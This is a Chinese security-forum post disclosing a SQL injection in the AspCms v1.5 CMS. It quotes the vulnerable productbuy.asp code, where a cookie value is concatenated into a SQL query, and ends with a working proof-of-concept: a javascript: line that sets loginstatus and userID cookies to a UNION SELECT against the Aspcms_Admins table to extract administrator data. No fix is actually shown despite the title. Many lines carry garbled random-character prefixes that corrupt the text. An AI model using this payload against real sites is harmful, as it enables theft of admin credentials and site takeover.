AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
4 R5 ?- P. ~/ N1 T; I* m3 B& d也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
废话不多说，看代码：

8 P; Y$ N+ L3 B& r+ F+ D& @<%

if action = "buy" then
% _: |1 J1 h- ~. T/ ]+ K" p
        addOrder()

  ~( p3 A% E% @9 p! ~" |8 b2 Kelse

        echoContent()

) @, N5 [3 i# |1 Y: pend if


+ e, F. S& H% c2 \' }0 C  D
……略过

7 v3 P- R3 M  M

! p0 w1 ~8 g* l- |Sub echoContent()
( G* T( \0 O0 G) _4 c' x
2 P% P# x4 ]% V        dim id

1 J2 F; b) ?% f2 ~. \        id=getForm("id","get")
( b- e' Y# ]# z- G+ t
        

        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"

        
6 q1 X4 x' V4 S3 d5 i  H% N
        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")

        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

        Dim templatePath,tempStr

        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
: d3 m: k) S) r% _
% O& s" b: `' c3 j

        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
8 C/ Z0 I' r% @
        selectproduct=rsObj(0)
  F% }: W3 g5 v
8 L' y7 A; D) X: _/ v        

, \2 g$ c5 j3 D        Dim linkman,gender,phone,mobile,email,qq,address,postcode
, k6 `# b( f* m+ S: X! v7 [
, h6 M8 Y1 _- P1 M& g8 s( B6 M9 d        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

3 w8 j! k9 f3 F% l' L  {% w* w        if rCookie("loginstatus")=1 then  
' z+ A, P7 l# \7 Y& i( d  r
/ W: _( r! `; d# B" U                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")

                linkman=rsObj("truename")

                gender=rsObj("gender")
: i2 I) i9 Y/ h0 l, k1 K
                phone=rsObj("phone")
% ]& p2 m* N6 ^% A, b
8 W5 m& o- o6 f; J2 S                mobile=rsObj("mobile")

                email=rsObj("email")
2 ~) |+ f! P: T: D8 q
                qq=rsObj("qq")
6 A/ y, p3 M1 |
                address=rsObj("address")

9 `3 N& ?/ C" I0 g: K                postcode=rsObj("postcode")

        else

) C$ {2 m8 g+ O8 N1 d' u) g                gender=1

        end if

3 x7 W/ o+ b; \8 p8 e        rsObj.close()
8 E. e# z, z6 y1 ]" g3 M
3 p  k3 j8 p! C2 q7 @# f               

        with templateObj

                .content=loadFile(templatePath)        

5 y! w# q1 T8 O                .parseHtml()
: V* A, W2 e" b2 B: O% K5 D4 o
5 S% x( r& O! m1 ^4 t- P                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)

; A9 z+ \& h" p$ x8 Z! s. E                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               

                .content=replaceStr(.content,"[aspcms:gender]",gender)               

                .content=replaceStr(.content,"[aspcms:phone]",phone)               
3 s" _- i- t! A2 y
: c" z% S3 L) W                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               

                .content=replaceStr(.content,"[aspcms:email]",email)                        

                .content=replaceStr(.content,"[aspcms:qq]",qq)                        
; q1 \9 M5 ~* V& W
2 R) K9 m7 ?# p' @. b5 j6 W                .content=replaceStr(.content,"[aspcms:address]",address)                        

                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
( T, q# V# }  h
  j/ l8 X, x* b( C1 U1 j                .parseCommon()                 

                echo .content
. x5 H. h/ r0 \4 y0 H& Q" Z' ~
        end with

        set templateobj =nothing : terminateAllObjects

3 Q" M- ^  B  P! _5 c" T4 kEnd Sub
漏洞很明显，没啥好说的
poc：

  J4 D. o/ Z7 d& Ljavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​

& s9 e) r1 N+ @